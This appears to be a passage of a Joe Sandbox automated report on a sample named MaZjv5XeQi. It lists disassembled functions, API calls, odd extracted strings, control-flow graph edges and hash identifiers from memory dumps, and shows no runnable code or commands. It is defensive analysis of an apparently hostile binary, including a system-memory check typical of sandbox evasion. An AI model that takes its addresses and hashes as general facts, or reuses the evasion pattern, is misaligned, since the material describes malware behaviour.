                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 009A8A4A
                                                                                                                                                                                                                                    • Part of subcall function 009AB7B0: FreeLibrary.KERNEL32(009A8A31), ref: 009AB7B6
                                                                                                                                                                                                                                    • Part of subcall function 009AB7B0: FreeLibrary.KERNEL32 ref: 009AB7D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                  • String ID: b]u)$}$}
                                                                                                                                                                                                                                  • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                  • Opcode ID: 7a0b3ac3d5ff76d1dd9272aca4aff8bc2686427cce6de778cb2a569f21c1ae71
                                                                                                                                                                                                                                  • Instruction ID: 12a2bad3840404c31d0df0fb1d5505058906d8f50af3f75104808cfcad84457b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a0b3ac3d5ff76d1dd9272aca4aff8bc2686427cce6de778cb2a569f21c1ae71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBC1E573E187144BC718DF69C84125AF7D6ABC8710F0AC52EA898EB391EA74DD058BC2
                                                                                                                                                                                                                                  Function 009CD34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 989 9cd34a-9cd362 990 9cd370-9cd382 989->990 990->990 991 9cd384-9cd389 990->991 992 9cd39b-9cd3a7 991->992 993 9cd38b-9cd38f 991->993 994 9cd3a9-9cd3ab 992->994 995 9cd3c1-9cd40f call 9dfe00 GetPhysicallyInstalledSystemMemory 992->995 996 9cd390-9cd399 993->996 997 9cd3b0-9cd3bd 994->997 1001 9cd410-9cd44d 995->1001 996->992 996->996 997->997 999 9cd3bf 997->999 999->995 1001->1001 1002 9cd44f-9cd498 call 9be960 1001->1002 1005 9cd4a0-9cd551 1002->1005 1005->1005 1006 9cd557-9cd55c 1005->1006 1007 9cd57d-9cd583 1006->1007 1008 9cd55e-9cd568 1006->1008 1009 9cd586-9cd58e 1007->1009 1010 9cd570-9cd579 1008->1010 1011 9cd5ab-9cd5b3 1009->1011 1012 9cd590-9cd591 1009->1012 1010->1010 1013 9cd57b 1010->1013 1015 9cd5cb-9cd611 1011->1015 1016 9cd5b5-9cd5b6 1011->1016 1014 9cd5a0-9cd5a9 1012->1014 1013->1009 1014->1011 1014->1014 1018 9cd620-9cd653 1015->1018 1017 9cd5c0-9cd5c9 1016->1017 1017->1015 1017->1017 1018->1018 1019 9cd655-9cd65a 1018->1019 1020 9cd65c-9cd65d 1019->1020 1021 9cd66d 1019->1021 1022 9cd660-9cd669 1020->1022 1023 9cd670-9cd67a 1021->1023 1022->1022 1024 9cd66b 1022->1024 1025 9cd67c-9cd67f 1023->1025 1026 9cd68b-9cd73c 1023->1026 1024->1023 1027 9cd680-9cd689 1025->1027 1027->1026 1027->1027
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 009CD3EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                  • String ID: ><+
                                                                                                                                                                                                                                  • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                  • Opcode ID: 55c978604cbf5477ddca047777558a9d3a99e4c0ecb51f851079b32c8963ed19
                                                                                                                                                                                                                                  • Instruction ID: 42fc1e986dea4b4e980d7c423c1cfcb1c93bedea7ba3b953f724b6b116415562
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55c978604cbf5477ddca047777558a9d3a99e4c0ecb51f851079b32c8963ed19
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C10575A057818FD725CF29C490722FBE2BF96310F1885ADD4DA8B752C735E802CB51
                                                                                                                                                                                                                                  Function 009E0D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: @Ukx$
                                                                                                                                                                                                                                  • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                  • Opcode ID: 241931c674dd8e06f503a9c560067dbf7f281d66efc377b9e1a3f69fc14e228c
                                                                                                                                                                                                                                  • Instruction ID: 1211b336019dd2535c403fa2124f56d3cc657ef16e465ec6cdf48fec12a2a14b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 241931c674dd8e06f503a9c560067dbf7f281d66efc377b9e1a3f69fc14e228c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B17632B083904BC729CE29DCD12BFB7A6EBC5314F19C93CD9865B395CA75AC458781
                                                                                                                                                                                                                                  Function 009AE687 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: A8DE765A6B6DDD2BBEBA0C6A975F1733
                                                                                                                                                                                                                                  • API String ID: 0-1420259744
                                                                                                                                                                                                                                  • Opcode ID: 02c1eb94a0ded23ac00f3cc6fa68520bd44b75666c8b4fd62864d1d8d840c2a0
                                                                                                                                                                                                                                  • Instruction ID: 26b307196f839b0b9b013bac3a3a7b4abfe3819bcd74dbd609446d1520e8b971
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02c1eb94a0ded23ac00f3cc6fa68520bd44b75666c8b4fd62864d1d8d840c2a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD8129756407418BD3258B38CC927A7B7E2EFDB315F1DC96CD4869B347E638A80287A0
                                                                                                                                                                                                                                  Function 009DE110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(009E148A,00FFC960,00000018,?,?,00000018,?,?,?), ref: 009DE13E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                  Function 009C7440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                  • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                  • Opcode ID: 4f2c22448e43a4f4645eecc54d82e869a55541c4f19df47f8c0237bed7e61a7e
                                                                                                                                                                                                                                  • Instruction ID: 69160e6e004ac5e26bf0c50ca8242206d336fe8acbf406c41ca9cc1887f19b3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f2c22448e43a4f4645eecc54d82e869a55541c4f19df47f8c0237bed7e61a7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB711AB1E0C3405BD7189BA8DCD2F3BF6A5DF92318F18852CE48687292E274DC059B57
                                                                                                                                                                                                                                  Function 009E1720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: =<32
                                                                                                                                                                                                                                  • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                  • Opcode ID: 5ad85ffe69dc911149ad5fc47b5fca308b75c4df54e11fa4bafbb04afc21d185
                                                                                                                                                                                                                                  • Instruction ID: c504700f0f203dac35832189dff0bd8da7bedb9244ef472081d1c96a76a00ffa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ad85ffe69dc911149ad5fc47b5fca308b75c4df54e11fa4bafbb04afc21d185
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5316838708384ABE715DA15DCD1B3FB7AAEB85B50F18852CE6859B2E0D771EC409782
                                                                                                                                                                                                                                  Function 009C1A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ,-
                                                                                                                                                                                                                                  • API String ID: 0-1027024164
                                                                                                                                                                                                                                  • Opcode ID: fe069f8a3572e12b6ffb5c331fbb710b5f723a92edceea24c42271f54ad4e638
                                                                                                                                                                                                                                  • Instruction ID: ec24b8861e110c69bd41c097948218220412c199b1bedb7477b281106c7113b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe069f8a3572e12b6ffb5c331fbb710b5f723a92edceea24c42271f54ad4e638
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9021F4A19153008BC7149F29C852A27B6B5EF87361B45861CE4868B352F734CD05C797
                                                                                                                                                                                                                                  Function 009E0340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                  • Opcode ID: fbc66ce1d7e71c2cc0d39d5b9c09d2867f3328b49fceec2e3e4a4d39b1d4b903
                                                                                                                                                                                                                                  • Instruction ID: 0dcdd4592935a43e4ef9546b6bae027f63a64287bfa7956a1ff8a55d11d15652
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbc66ce1d7e71c2cc0d39d5b9c09d2867f3328b49fceec2e3e4a4d39b1d4b903
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D031FF716083448BC314DF58D8C266FBBE8EBC5324F14992CE698872E0E375DC88CB92
                                                                                                                                                                                                                                  Function 009E0460 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
